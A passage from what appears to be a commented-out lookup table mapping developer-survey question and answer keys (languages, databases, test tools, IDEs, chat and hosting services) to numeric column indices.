# "kind_of_dev.In-house development": 1707,
# "kind_of_dev.Internal deployment and maintenance of third-party tools": 1708,
# "kind_of_dev.Customer services development (websites, mobile apps, etc_)": 1709,
# "kind_of_dev.Open source projects": 1710,
# "kind_of_dev.Other": 1711
# },
# "java_unittesting": {
# "java_unittesting.JUnit": 555,
# "java_unittesting.TestNG": 556,
# "java_unittesting.Mockito": 557,
# "java_unittesting.PowerMock": 558,
# "java_unittesting.Spock": 559,
# "java_unittesting.EasyMock": 560,
# "java_unittesting.JMockit": 561,
# "java_unittesting.Other": 562
# },
# "swiftoc_platforms": {
# "swiftoc_platforms.iOS": 1101,
# "swiftoc_platforms.tvOS": 1102,
# "swiftoc_platforms.watchOS": 1103,
# "swiftoc_platforms.macOS": 1104,
# "swiftoc_platforms.I don\u2019t develop for Apple platforms": 1105
# },
# "swiftoc_cpp_libs": {
# "swiftoc_cpp_libs": 1107
# },
# "swiftoc_ui_frameworks": {
# "swiftoc_ui_frameworks.None": 1123,
# "swiftoc_ui_frameworks.XCTest": 1124,
# "swiftoc_ui_frameworks.KIF": 1125,
# "swiftoc_ui_frameworks.EarlGrey": 1126,
# "swiftoc_ui_frameworks.iOSSnapshotTestCase (FBSnapshotTestCase)": 1127,
# "swiftoc_ui_frameworks.Other": 1128
# },
# "swiftoc_db_viewer_do": {
# "swiftoc_db_viewer_do": 1141
# },
# "swiftoc_db_viewer": {
# "swiftoc_db_viewer_do": 1141,
# "swiftoc_db_viewer": 1142
# },
# "swiftoc_together": {
# "swiftoc_together": 1106
# },
# "employment_status": {
# "employment_status": 0
# },
# "test_types": {
# "test_types.None": 244,
# "test_types.Unit": 245,
# "test_types.Integration": 246,
# "test_types.End-to-End": 247,
# "test_types.Other": 248
# },
# "db": {
# "db.None": 251,
# "db.DB2": 252,
# "db.MS SQL Server": 253,
# "db.MySQL": 254,
# "db.Oracle Database": 255,
# "db.PostgreSQL": 256,
# "db.SQLite": 257,
# "db.Cassandra": 258,
# "db.Couchbase": 259,
# "db.HBase": 260,
# "db.MongoDB": 261,
# "db.Neo4j": 262,
# "db.Redis": 263,
# "db.Amazon Redshift": 264,
# "db.H2": 265,
# "db.MariaDB": 266,
# "db.Exasol": 267,
# "db.ClickHouse": 268,
# "db.Other": 269,
# "db_adopt.No, not planning to adopt / migrate": 270,
# "db_adopt.Yes, planning to adopt / migrate to other database(s) - Write in": 271,
# "db_adopt.DB2": 272,
# "db_adopt.MS SQL Server": 273,
# "db_adopt.MySQL": 274,
# "db_adopt.Oracle Database": 275,
# "db_adopt.PostgreSQL": 276,
# "db_adopt.SQLite": 277,
# "db_adopt.Cassandra": 278,
# "db_adopt.Couchbase": 279,
# "db_adopt.HBase": 280,
# "db_adopt.MongoDB": 281,
# "db_adopt.Neo4j": 282,
# "db_adopt.Redis": 283,
# "db_adopt.Amazon Redshift": 284,
# "db_adopt.H2": 285,
# "db_adopt.MariaDB": 286,
# "db_adopt.ClickHouse": 287,
# "db_adopt.Other": 288
# },
# "c_dependencymanager": {
# "c_dependencymanager.None": 625,
# "c_dependencymanager.build2": 626,
# "c_dependencymanager.Conan": 627,
# "c_dependencymanager.Nuget": 628,
# "c_dependencymanager.vcpkg": 629,
# "c_dependencymanager.I rely on a system package manager": 630,
# "c_dependencymanager.Other": 631
# },
# "cpp_dependencymanager": {
# "cpp_dependencymanager.None": 670,
# "cpp_dependencymanager.build2": 671,
# "cpp_dependencymanager.Conan": 672,
# "cpp_dependencymanager.Hunter": 673,
# "cpp_dependencymanager.Nuget": 674,
# "cpp_dependencymanager.vcpkg": 675,
# "cpp_dependencymanager.I rely on a system package manager": 676,
# "cpp_dependencymanager.Other": 677
# },
# "cpp_guidelines_tools": {
# "cpp_guidelines_tools.None": 696,
# "cpp_guidelines_tools.Clang-analyzer / Clang Static Analyzer": 697,
# "cpp_guidelines_tools.Clang-tidy": 698,
# "cpp_guidelines_tools.Cppcheck": 699,
# "cpp_guidelines_tools.Coverity": 700,
# "cpp_guidelines_tools.Cpplint": 701,
# "cpp_guidelines_tools.PVS-Studio": 702,
# "cpp_guidelines_tools.Klocwork": 703,
# "cpp_guidelines_tools.PC-lint / Flexelint": 704,
# "cpp_guidelines_tools.Parasoft C/C++test": 705,
# "cpp_guidelines_tools.QA-C++": 706,
# "cpp_guidelines_tools.Stack": 707,
# "cpp_guidelines_tools.Tool provided by my IDE (Visual Studio, ReSharper C++, CLion, etc_)": 708,
# "cpp_guidelines_tools.Other": 709
# },
# "cpp_guidelines_sources": {
# "cpp_guidelines_sources.None": 710,
# "cpp_guidelines_sources.Effective C++ series (books by <NAME>)": 711,
# "cpp_guidelines_sources.C++ Core Guidelines \u2013 main project (github_com/isocpp/CppCoreGuidelines)": 712,
# "cpp_guidelines_sources.Guru of the Week / Exceptional C++ series (blog/books by Herb Sutter)": 713,
# "cpp_guidelines_sources.C++ Coding Standards (book by <NAME> and <NAME>)": 714,
# "cpp_guidelines_sources.Abseil tips of the week": 715,
# "cpp_guidelines_sources.Google C++ Style Guide": 716,
# "cpp_guidelines_sources.CERT C++ Secure Coding Standard (www_securecoding_cert_org)": 717,
# "cpp_guidelines_sources.Coding Standards (<NAME>)": 718,
# "cpp_guidelines_sources.High Integrity C++ Coding Standard (Programming Research)": 719,
# "cpp_guidelines_sources.C++ Core Guidelines \u2013 a company-specific fork/branch augmented with internal rules": 720,
# "cpp_guidelines_sources.MISRA C++ (MIRA Ltd_)": 721,
# "cpp_guidelines_sources.Other": 722
# },
# "python_ds_libs": {
# "python_ds_libs.None": 757,
# "python_ds_libs.NumPy": 758,
# "python_ds_libs.SciPy": 759,
# "python_ds_libs.Pandas": 760,
# "python_ds_libs.Matplotlib": 761,
# "python_ds_libs.Seaborn": 762,
# "python_ds_libs.SciKit-Learn": 763,
# "python_ds_libs.Keras": 764,
# "python_ds_libs.TensorFlow": 765,
# "python_ds_libs.Theano": 766,
# "python_ds_libs.NLTK": 767,
# "python_ds_libs.Gensim": 768,
# "python_ds_libs.Other": 769
# },
# "python_other_libs": {
# "python_other_libs.None": 770,
# "python_other_libs.Requests": 771,
# "python_other_libs.aiohttp": 772,
# "python_other_libs.PyQT": 773,
# "python_other_libs.PyGTK": 774,
# "python_other_libs.wxPython": 775,
# "python_other_libs.Pillow": 776,
# "python_other_libs.Tkinter": 777,
# "python_other_libs.Pygame": 778,
# "python_other_libs.Twisted": 779,
# "python_other_libs.Asyncio": 780,
# "python_other_libs.Kivy": 781,
# "python_other_libs.Six": 782,
# "python_other_libs.Scrapy": 783,
# "python_other_libs.Other": 784
# },
# "python_web_libs": {
# "python_web_libs.None": 745,
# "python_web_libs.Django": 746,
# "python_web_libs.TurboGears": 747,
# "python_web_libs.web2py": 748,
# "python_web_libs.Bottle": 749,
# "python_web_libs.CherryPy\u00a0": 750,
# "python_web_libs.Flask\u00a0": 751,
# "python_web_libs.Hug": 752,
# "python_web_libs.Pyramid\u00a0": 753,
# "python_web_libs.Tornado": 754,
# "python_web_libs.Falcon": 755,
# "python_web_libs.Other": 756
# },
# "js_sslang": {
# "js_sslang.CSS": 1269,
# "js_sslang.Sass": 1270,
# "js_sslang.SCSS": 1271,
# "js_sslang.Less": 1272,
# "js_sslang.PostCSS": 1273,
# "js_sslang.CSS-in-JS": 1274,
# "js_sslang.CSS Modules": 1275,
# "js_sslang.Stylus": 1276,
# "js_sslang.Other": 1277
# },
# "js_graphql": {
# "js_graphql": 1278
# },
# "js_monorepo": {
# "js_monorepo": 1279
# },
# "learn_time": {
# "learn_time": 1647
# },
# "learn_kind_of_content": {
# "learn_kind_of_content": 1646
# },
# "php_qualitytools": {
# "php_qualitytools.None": 920,
# "php_qualitytools.PHP_CodeSniffer": 921,
# "php_qualitytools.PHP CS Fixer": 922,
# "php_qualitytools.PHPMD": 923,
# "php_qualitytools.PHPStan": 924,
# "php_qualitytools.Psalm": 925,
# "php_qualitytools.Phan": 926,
# "php_qualitytools.Other": 927
# },
# "php_templateengines": {
# "php_templateengines.None, I use pure PHP": 928,
# "php_templateengines.None, I don\u2019t render HTML": 929,
# "php_templateengines.Twig": 930,
# "php_templateengines.Blade": 931,
# "php_templateengines.Smarty": 932,
# "php_templateengines.Mustache": 933,
# "php_templateengines.Latte": 934,
# "php_templateengines.Other": 935
# },
# "php_profiler": {
# "php_profiler.None": 936,
# "php_profiler.Xdebug Profiler": 937,
# "php_profiler.XHProf": 938,
# "php_profiler.Blackfire_io": 939,
# "php_profiler.APM solutions (New Relic, Tideways, etc_)": 940,
# "php_profiler.HTTP load testing (ab, siege, etc_)": 941,
# "php_profiler.Other": 942
# },
# "devops_use_docker": {
# "devops_use_docker.Run dockerized utilities": 1504,
# "devops_use_docker.Run your application in one container, and backing services (e_g_ database)": 1505,
# "devops_use_docker.Run multiple application containers (e_g_ microservices)": 1506,
# "devops_use_docker.Other": 1507
# },
# "go_modules_outside": {
# "go_modules_outside": 1478
# },
# "go_migrate": {
# "go_migrate": 1479
# },
# "csharp_vsplugins": {
# "csharp_vsplugins.None": 828,
# "csharp_vsplugins.ReSharper": 829,
# "csharp_vsplugins.ReSharper C++": 830,
# "csharp_vsplugins.CodeRush": 831,
# "csharp_vsplugins.Visual Assist": 832,
# "csharp_vsplugins.Roslynator": 833,
# "csharp_vsplugins.Other": 834
# },
# "csharp_vsedition": {
# "csharp_vsedition": 851
# },
# "csharp_msdn_type": {
# "csharp_msdn_type": 869
# },
# "swiftoc_mock": {
# "swiftoc_mock.None": 1114,
# "swiftoc_mock.OCMock": 1115,
# "swiftoc_mock.OCMockito": 1116,
# "swiftoc_mock.Expecta": 1117,
# "swiftoc_mock.OCHamcrest": 1118,
# "swiftoc_mock.Cuckoo": 1119,
# "swiftoc_mock.SwiftHamcrest": 1120,
# "swiftoc_mock.Other": 1121
# },
# "kotlin_target": {
# "kotlin_target.JVM": 943,
# "kotlin_target.Android": 944,
# "kotlin_target.Kotlin for JavaScript": 945,
# "kotlin_target.Native": 946
# },
# "kotlin_jdk": {
# "kotlin_jdk.JDK 6": 947,
# "kotlin_jdk.JDK 7": 948,
# "kotlin_jdk.JDK 8": 949,
# "kotlin_jdk.JDK 9": 950,
# "kotlin_jdk.JDK 10": 951,
# "kotlin_jdk.JDK 11": 952,
# "kotlin_jdk.I don't know": 953
# },
# "kotlin_android": {
# "kotlin_android.4_1 \u2013 4_3_1 \u00a0Jelly Bean": 954,
# "kotlin_android.4_4 \u2013 4_4_4 \u00a0KitKat \u00a0": 955,
# "kotlin_android.5_0 \u2013 5_1_1 \u00a0Lollipop": 956,
# "kotlin_android.6_0 \u2013 6_0_1 \u00a0Marshmallow": 957,
# "kotlin_android.7_0 \u2013 7_1_2 \u00a0Nougat": 958,
# "kotlin_android.8_0 \u2013 8_1 \u00a0Oreo": 959,
# "kotlin_android.9_0 Pie": 960,
# "kotlin_android.Other": 961
# },
# "kotlin_platforms": {
# "kotlin_platforms.iOS (arm32, arm64, emulator x86_64)": 964,
# "kotlin_platforms.MacOS (x86_64)": 965,
# "kotlin_platforms.Android (arm32, arm64)": 966,
# "kotlin_platforms.Windows (mingw x86_64)": 967,
# "kotlin_platforms.Linux (x86_64, arm32, MIPS, MIPS little endian)": 968,
# "kotlin_platforms.Other": 969
# },
# "kotlin_purposes": {
# "kotlin_purposes.For work": 1034,
# "kotlin_purposes.For personal/side projects\u00a0": 1035,
# "kotlin_purposes.I occasionally play around with Kotlin (Hobby)": 1036,
# "kotlin_purposes.Other": 1037
# },
# "kotlin_projecttypes": {
# "kotlin_projecttypes.New projects": 1038,
# "kotlin_projecttypes.Old projects (migration)": 1039,
# "kotlin_projecttypes.Other": 1040
# },
# "communication_tools": {
# "communication_tools.Email (Microsoft Mail Server, Gmail, etc_)": 377,
# "communication_tools.Instant messaging/video calling (Slack, Skype, Hipchat, etc_)": 378,
# "communication_tools.Video conferencing (Google Meet, Zoom, etc_)": 379,
# "communication_tools.Calendars (Google Calendar, etc_)": 380,
# "communication_tools.Corporate portal (MS Sharepoint, Pingboard, etc_)": 381,
# "communication_tools.Service desk/Help desk (Zendesk, Jira Service Desk, etc_)": 382,
# "communication_tools.None": 383
# },
# "mobile_apps": {
# "mobile_apps.None": 384,
# "mobile_apps.Email (Microsoft Mail Server, Gmail, etc_)": 385,
# "mobile_apps.Instant messaging/video calling (Slack, Skype, Hipchat, etc_)": 386,
# "mobile_apps.Video conferencing (Google Meet, Zoom, etc_)": 387,
# "mobile_apps.Calendars (Google Calendar, etc_)": 388,
# "mobile_apps.Corporate portal (MS Sharepoint, Pingboard, etc_)": 389,
# "mobile_apps.Service desk/Help desk (Zendesk, Jira Service Desk, etc_)": 390
# },
# "corporate_mail_server": {
# "corporate_mail_server": 391
# },
# "corporate_suite": {
# "corporate_suite.None": 392,
# "corporate_suite.G Suite (Gmail, Google Drive, Meet, etc_)": 393,
# "corporate_suite.Office 365 (Outlook, Microsoft Teams, SharePoint, etc)": 394,
# "corporate_suite.Zoho": 395,
# "corporate_suite.Other": 396
# },
# "email_server": {
# "email_server": 403
# },
# "chat": {
# "chat.Mattermost": 411,
# "chat.Telegram": 412,
# "chat.WhatsApp": 413,
# "chat.Hipchat/Stride": 414,
# "chat.Viber": 415,
# "chat.Slack": 416,
# "chat.Rocket_Chat": 417,
# "chat.Zulip": 418,
# "chat.Skype": 419,
# "chat.Google Hangouts": 420,
# "chat.IRC": 421,
# "chat.Other": 422
# },
# "video_calls": {
# "video_calls.Slack": 423,
# "video_calls.Skype": 424,
# "video_calls.Skype for Business, Lync": 425,
# "video_calls.MS Teams": 426,
# "video_calls.Google Meet": 427,
# "video_calls.Polycom": 428,
# "video_calls.Zoom": 429,
# "video_calls.Other": 430
# },
# "knowledge_base": {
# "knowledge_base.None": 431,
# "knowledge_base.Confluence": 432,
# "knowledge_base.MediaWiki": 433,
# "knowledge_base.GitHub Wiki": 434,
# "knowledge_base.Stack Overflow for Teams": 435,
# "knowledge_base.Custom": 436,
# "knowledge_base.Other": 437
# },
# "document_collaboration_platforms": {
# "document_collaboration_platforms.None": 446,
# "document_collaboration_platforms.Office 365": 447,
# "document_collaboration_platforms.Zoho Office Suite": 448,
# "document_collaboration_platforms. Confluence": 449,
# "document_collaboration_platforms.Google Docs\u00a0": 450,
# "document_collaboration_platforms.Dropbox Paper": 451,
# "document_collaboration_platforms.Quip": 452,
# "document_collaboration_platforms.Other": 453
# },
# "file_sharing_tools": {
# "file_sharing_tools.None": 438,
# "file_sharing_tools.Google Drive": 439,
# "file_sharing_tools.Dropbox": 440,
# "file_sharing_tools.OneCloud": 441,
# "file_sharing_tools.Microsoft OneDrive": 442,
# "file_sharing_tools.Sharepoint": 443,
# "file_sharing_tools.On premise FTP server": 444,
# "file_sharing_tools.Other": 445
# },
# "swiftoc_serverside": {
# "swiftoc_serverside": 1150,
# "swiftoc_serverside_frameworks.Kitura": 1151,
# "swiftoc_serverside_frameworks.Vapor": 1152,
# "swiftoc_serverside_frameworks.Perfect": 1153,
# "swiftoc_serverside_frameworks.Other": 1154
# },
# "swiftoc_serverside_frameworks": {
# "swiftoc_serverside_frameworks.Kitura": 1151,
# "swiftoc_serverside_frameworks.Vapor": 1152,
# "swiftoc_serverside_frameworks.Perfect": 1153,
# "swiftoc_serverside_frameworks.Other": 1154
# },
# "rust_how": {
# "rust_how.Work": 1280,
# "rust_how.Personal / side projects": 1281,
# "rust_how.Hobby": 1282,
# "rust_how.Other": 1283,
# "rust_how_long": 1284
# },
# "rust_how_long": {
# "rust_how_long": 1284
# },
# "rust_version": {
# "rust_version.Current stable release": 1285,
# "rust_version.Previous stable release": 1286,
# "rust_version.Beta release": 1287,
# "rust_version.Nightly": 1288,
# "rust_version.1_30 or older": 1289
# },
# "rust_other_langs": {
# "rust_other_langs.None": 1290,
# "rust_other_langs.C": 1291,
# "rust_other_langs.C++": 1292,
# "rust_other_langs.Python": 1293,
# "rust_other_langs.Java": 1294,
# "rust_other_langs.Go": 1295,
# "rust_other_langs.JavaScript": 1296,
# "rust_other_langs.Other": 1297
# },
# "rust_code_interact": {
# "rust_code_interact.Language interop (foreign functions)": 1298,
# "rust_code_interact.RPC": 1299,
# "rust_code_interact.REST API": 1300,
# "rust_code_interact.Other": 1301
# },
# "rust_ide": {
# "rust_ide.Atom": 1304,
# "rust_ide.Emacs": 1305,
# "rust_ide.IntelliJ IDEA": 1306,
# "rust_ide.CLion": 1307,
# "rust_ide.Sublime Text": 1308,
# "rust_ide.Vim": 1309,
# "rust_ide.VSCode (Visual Studio Code)": 1310,
# "rust_ide.Other": 1311,
# "rust_ide_mostlove.Speed/performance": 1313,
# "rust_ide_mostlove.Ease of use": 1314,
# "rust_ide_mostlove.Code completion": 1315,
# "rust_ide_mostlove.Code navigation": 1316,
# "rust_ide_mostlove.Error highlighting": 1317,
# "rust_ide_mostlove.Tools integration": 1318,
# "rust_ide_mostlove.Debugger support": 1319,
# "rust_ide_mostlove.Other": 1320,
# "rust_ide_lack.Speed/performance": 1321,
# "rust_ide_lack.Ease of use": 1322,
# "rust_ide_lack.Code completion": 1323,
# "rust_ide_lack.Code navigation": 1324,
# "rust_ide_lack.Error highlighting": 1325,
# "rust_ide_lack.Tools integration": 1326,
# "rust_ide_lack.Debugger support": 1327,
# "rust_ide_lack.Other": 1328
# },
# "rust_build_tool": {
# "rust_build_tool.Cargo": 1329,
# "rust_build_tool.Other": 1330
# },
# "rust_testing": {
# "rust_testing.I don\u2019t use testing frameworks": 1331,
# "rust_testing.Rust tests": 1332,
# "rust_testing.Other": 1333
# },
# "rust_code_coverage": {
# "rust_code_coverage.I don\u2019t use code coverage tools": 1334,
# "rust_code_coverage.codecov": 1335,
# "rust_code_coverage.Other": 1336
# },
# "rust_profiler": {
# "rust_profiler.I don\u2019t use profiling tools": 1337,
# "rust_profiler.perf": 1338,
# "rust_profiler.callgrind/cachegrind": 1339,
# "rust_profiler.Other": 1340
# },
# "ai_replace": {
# "ai_replace": 526
# },
# "rust_os": {
# "rust_os": 1302
# },
# "rust_platforms": {
# "rust_platforms.Linux": 1353,
# "rust_platforms.Windows": 1354,
# "rust_platforms.macOS": 1355,
# "rust_platforms.Android": 1356,
# "rust_platforms.iOS": 1357,
# "rust_platforms.WebAssembly": 1358,
# "rust_platforms.Embedded": 1359
# },
# "rust_code_size": {
# "rust_code_size": 1360
# },
# "rust_external_deps": {
# "rust_external_deps": 1361
# },
# "rust_current_codebase": {
# "rust_current_codebase": 1362
# },
# "rust_devs_count": {
# "rust_devs_count": 1363
# },
# "cats_dogs": {
# "cats_dogs": 1648
# },
# "where_survey": {
# "where_survey": 1584
# },
# "rust_primary_ide": {
# "rust_primary_ide": 1312
# },
# "rust_ide_mostlove": {
# "rust_ide_mostlove.Speed/performance": 1313,
# "rust_ide_mostlove.Ease of use": 1314,
# "rust_ide_mostlove.Code completion": 1315,
# "rust_ide_mostlove.Code navigation": 1316,
# "rust_ide_mostlove.Error highlighting": 1317,
# "rust_ide_mostlove.Tools integration": 1318,
# "rust_ide_mostlove.Debugger support": 1319,
# "rust_ide_mostlove.Other": 1320
# },
# "rust_ide_lack": {
# "rust_ide_lack.Speed/performance": 1321,
# "rust_ide_lack.Ease of use": 1322,
# "rust_ide_lack.Code completion": 1323,
# "rust_ide_lack.Code navigation": 1324,
# "rust_ide_lack.Error highlighting": 1325,
# "rust_ide_lack.Tools integration": 1326,
# "rust_ide_lack.Debugger support": 1327,
# "rust_ide_lack.Other": 1328
# },
# "calendar_software": {
# "calendar_software.Google Calendar": 404,
# "calendar_software.Outlook": 405,
# "calendar_software.iCal (Calendar App in Mac)": 406,
# "calendar_software.Microsoft Exchange": 407,
# "calendar_software.IBM Domino": 408,
# "calendar_software.Fantastical": 409,
# "calendar_software.Other": 410
# },
# "email_clients": {
# "email_clients.Gmail": 397,
# "email_clients.Yahoo": 398,
# "email_clients.Outlook": 399,
# "email_clients.Thunderbird": 400,
# "email_clients.Mail in macOS": 401,
# "email_clients.Other": 402
# },
# "code_in_dreams": {
# "code_in_dreams": 1483
# },
# "where_host": {
# "where_host.Locally (on your workstation, developer environment or device)": 1539,
# "where_host.Private Servers (hosted on your company\u2019s cluster or server on-premises)": 1540,
# "where_host.Cloud Service (AWS, MS Azure, GCP, etc_)": 1541,
# "where_host.Other": 1542,
# "where_host_primarly": 1547,
# "where_host_plan.Locally (on your workstation, developer environment or device)": 1557,
# "where_host_plan.Private Servers (hosted on your company\u2019s cluster or server on-premises)": 1558,
# "where_host_plan.Amazon Web Services": 1559,
# "where_host_plan.Microsoft Azure": 1560,
# "where_host_plan.Google Cloud Platform": 1561,
# "where_host_plan.Rackspace": 1562,
# "where_host_plan.RedHat OpenShift": 1563,
# "where_host_plan.IBM SoftLayer": 1564,
# "where_host_plan.Cloud Foundry": 1565,
# "where_host_plan.Heroku": 1566,
# "where_host_plan.Other": 1567
# },
# "where_host_primarly": {
# "where_host_primarly": 1547
# },
# "where_host_plan": {
# "where_host_plan.Locally (on your workstation, developer environment or device)": 1557,
# "where_host_plan.Private Servers (hosted on your company\u2019s cluster or server on-premises)": 1558,
# "where_host_plan.Amazon Web Services": 1559,
# "where_host_plan.Microsoft Azure": 1560,
# "where_host_plan.Google Cloud Platform": 1561,
# "where_host_plan.Rackspace": 1562,
# "where_host_plan.RedHat OpenShift": 1563,
# "where_host_plan.IBM SoftLayer": 1564,
# "where_host_plan.Cloud Foundry": 1565,
# "where_host_plan.Heroku": 1566,
# "where_host_plan.Other": 1567
# },
# "rust_projecttypes": {
# "rust_projecttypes.Web development": 1341,
# "rust_projecttypes.Systems programming": 1342,
# "rust_projecttypes.DevOps": 1343,
# "rust_projecttypes.Network programming": 1344,
# "rust_projecttypes.Databases": 1345,
# "rust_projecttypes.Security": 1346,
# "rust_projecttypes.Desktop / GUI applications": 1347,
# "rust_projecttypes.Embedded devices / Internet of Things": 1348,
# "rust_projecttypes.Academic / Scientific / Numeric": 1349,
# "rust_projecttypes.Machine learning / Artificial intelligence": 1350,
# "rust_projecttypes.Games": 1351,
# "rust_projecttypes.Other": 1352
# },
# "commute": {
# "commute.I work / study from home": 1603,
# "commute.Car": 1604,
# "commute.Public transport": 1605,
# "commute.Bike": 1606,
# "commute.Motorcycle": 1607,
# "commute.By foot": 1608,
# "commute.Other": 1609
# },
# "fuel": {
# "fuel": 1610
# },
# "go_how": {
# "go_how": 1426
# },
# "sql_oracle": {
# "sql_oracle.18c": 1373,
# "sql_oracle.12_x": 1374,
# "sql_oracle.11_x": 1375,
# "sql_oracle.10_x": 1376,
# "sql_oracle.9_x": 1377,
# "sql_oracle.I'm not sure": 1378,
# "sql_oracle.Other": 1379
# },
# "kotlin_server_client": {
# "kotlin_server_client.Server-side (like Node_js)": 962,
# "kotlin_server_client.Browser": 963
# },
# "go_templateengines": {
# "go_templateengines.None": 1430,
# "go_templateengines.text/template": 1431,
# "go_templateengines.html/template": 1432,
# "go_templateengines.Plush": 1433,
# "go_templateengines.Pongo2": 1434,
# "go_templateengines.Other": 1435
# },
# "go_ide": {
# "go_ide": 1444
# },
# "position_level": {
# "position_level": 18
# },
# "do_crossplatform": {
# "do_crossplatform": 53
# },
# "crossplatform_platform": {
# "crossplatform_platform.Windows": 54,
# "crossplatform_platform.Unix/Linux": 55,
# "crossplatform_platform.macOS": 56,
# "crossplatform_platform.iOS": 57,
# "crossplatform_platform.Android": 58,
# "crossplatform_platform.Web": 59,
# "crossplatform_platform.Embedded": 60,
# "crossplatform_platform.Other": 61
# },
# "crossplatform_how_os": {
# "crossplatform_how_os.Using containers (e_g_ Docker, Vagrant)": 62,
# "crossplatform_how_os.Using VMs (e_g_ VirtualBox, vSphere)": 63,
# "crossplatform_how_os.Using physical machines/devices": 64,
# "crossplatform_how_os.I don\u2019t normally work with different OSes/platforms": 65,
# "crossplatform_how_os.Other": 66
# },
# "crossplatform_how_fs": {
# "crossplatform_how_fs.Using OS file browser (e_g_ File Explorer, Files, Finder)": 67,
# "crossplatform_how_fs.Using the IDE": 68,
# "crossplatform_how_fs.Using terminal (e_g_ cd, dir/ls, copy, mv)": 69,
# "crossplatform_how_fs.Using third-party GUI file managers (e_g_ muCommander, Path Finder, Total Commander)": 70,
# "crossplatform_how_fs.Using third-party terminal-based file managers (e_g_ Midnight Commander, Far Manager)": 71
# },
# "remote_files_operations": {
# "remote_files_operations.Browse files": 72,
# "remote_files_operations.Copy/move/delete files": 73,
# "remote_files_operations.Edit files": 74,
# "remote_files_operations.I don\u2019t normally work with remote files": 75
# },
# "vcs_how": {
# "vcs_how.From terminal": 514,
# "vcs_how.Using specialized tools (e_g_ GitKraken, Sourcetree, GitHub desktop, etc_)": 515,
# "vcs_how.From IDE": 516,
# "vcs_how.From web browser": 517,
# "vcs_how.Other": 518
# },
# "is_testing_integral": {
# "is_testing_integral": 289
# },
# "do_case_design": {
# "do_case_design": 290
# },
# "test_design_how": {
# "test_design_how": 291
# },
# "testing_types": {
# "testing_types.None": 292,
# "testing_types.Regression testing": 293,
# "testing_types.Functional testing": 294,
# "testing_types.Security testing": 295,
# "testing_types.Usability testing": 296,
# "testing_types.Performance testing": 297,
# "testing_types.Stress testing": 298,
# "testing_types.Stability testing": 299,
# "testing_types.Smoke testing": 300,
# "testing_types.I\u2019m not sure": 301,
# "testing_types.Other": 302
# },
# "testers_qa_ratio": {
# "testers_qa_ratio": 303
# },
# "store_testcases": {
# "store_testcases.I don\u2019t use any specific tools_": 306,
# "store_testcases.Microsoft Office documents (such as Excel spreadsheets)": 307,
# "store_testcases.Special test case management tools": 308,
# "store_testcases.Other": 309
# },
# "automated_tests": {
# "automated_tests": 310
# },
# "auto_tests_pl": {
# "auto_tests_pl.None": 334,
# "auto_tests_pl.Python": 335,
# "auto_tests_pl.JavaScript": 336,
# "auto_tests_pl.Java": 337,
# "auto_tests_pl.Kotlin": 338,
# "auto_tests_pl.C#": 339,
# "auto_tests_pl.Ruby": 340,
# "auto_tests_pl.Other": 341
# },
# "testers_qa_pskills": {
# "testers_qa_pskills": 304
# },
# "testers_qa_manual": {
# "testers_qa_manual": 305
# },
# "auto_tests_frameworks": {
# "auto_tests_frameworks.None": 311,
# "auto_tests_frameworks.TestNG": 312,
# "auto_tests_frameworks.JUnit": 313,
# "auto_tests_frameworks.NUnit / xUnit_Net": 314,
# "auto_tests_frameworks.MSTest / VSTest": 315,
# "auto_tests_frameworks.Robot Framework": 316,
# "auto_tests_frameworks.Cucumber": 317,
# "auto_tests_frameworks.SpecFlow": 318,
# "auto_tests_frameworks.RSpec": 319,
# "auto_tests_frameworks.Selenium WebDriver": 320,
# "auto_tests_frameworks.Allure": 321,
# "auto_tests_frameworks.Other": 322
# },
# "auto_tests_tools": {
# "auto_tests_tools.None": 323,
# "auto_tests_tools.SoapUI": 324,
# "auto_tests_tools.Apache JMeter": 325,
# "auto_tests_tools.Katalon Studio": 326,
# "auto_tests_tools.Postman": 327,
# "auto_tests_tools.Other": 328
# },
# "testing_platforms": {
# "testing_platforms.None": 329,
# "testing_platforms.SauceLabs": 330,
# "testing_platforms.BrowserStack": 331,
# "testing_platforms.CrossBrowserTesting": 332,
# "testing_platforms.Other": 333
# },
# "go_buildsystem": {
# "go_buildsystem.Go build": 1480,
# "go_buildsystem.Bazel": 1481,
# "go_buildsystem.Other": 1482
# },
# "devops_run_cont_apps": {
# "devops_run_cont_apps.Docker Compose": 1518,
# "devops_run_cont_apps.Minikube": 1519,
# "devops_run_cont_apps.Other": 1520
# },
# "kotlin_app_types": {
# "kotlin_app_types.Web Back-end": 970,
# "kotlin_app_types.Web Front-end": 971,
# "kotlin_app_types.Mobile": 972,
# "kotlin_app_types.Desktop": 973,
# "kotlin_app_types.Data analysis / BI": 974,
# "kotlin_app_types.Machine Learning": 975,
# "kotlin_app_types.Game development": 976,
# "kotlin_app_types.IoT": 977,
# "kotlin_app_types.Embedded": 978,
# "kotlin_app_types.Library or framework": 979,
# "kotlin_app_types.Tooling": 980,
# "kotlin_app_types.Other": 981
# },
# "kotlin_jb_libs": {
# "kotlin_jb_libs.None": 982,
# "kotlin_jb_libs.kotlin-wrappers/kotlin-react": 983,
# "kotlin_jb_libs.kotlin-wrappers/kotlin-css": 984,
# "kotlin_jb_libs.kotlin-wrappers/*": 985,
# "kotlin_jb_libs.kotlinx_coroutines": 986,
# "kotlin_jb_libs.kotlinx_html": 987,
# "kotlin_jb_libs.kotlinx_dom": 988,
# "kotlin_jb_libs.kotlinx_reflect_lite": 989,
# "kotlin_jb_libs.Anko Commons": 990,
# "kotlin_jb_libs.Anko Layouts": 991,
# "kotlin_jb_libs.Anko SQLite": 992,
# "kotlin_jb_libs.Anko Coroutines": 993,
# "kotlin_jb_libs.kotlin_test": 994,
# "kotlin_jb_libs.Ktor": 995,
# "kotlin_jb_libs.Dokka": 996,
# "kotlin_jb_libs.Exposed": 997,
# "kotlin_jb_libs.Other": 998
# },
# "kotlin_other_libs": {
# "kotlin_other_libs.None": 999,
# "kotlin_other_libs.Kotlin Android Extensions": 1000,
# "kotlin_other_libs.jackson-module-kotlin": 1001,
# "kotlin_other_libs.TornadoFX": 1002,
# "kotlin_other_libs.KotlinTest": 1003,
# "kotlin_other_libs.detekt": 1004,
# "kotlin_other_libs.kotlin-logging": 1005,
# "kotlin_other_libs.RxKotlin": 1006,
# "kotlin_other_libs.Spek": 1007,
# "kotlin_other_libs.HamKrest": 1008,
# "kotlin_other_libs.Kotlin-NoSQL": 1009,
# "kotlin_other_libs.Fuel": 1010,
# "kotlin_other_libs.Kotter Knife": 1011,
# "kotlin_other_libs.Kotson": 1012,
# "kotlin_other_libs.Kodein": 1013,
# "kotlin_other_libs.Klaxon": 1014,
# "kotlin_other_libs.mockito-kotlin": 1015,
# "kotlin_other_libs.khttp": 1016,
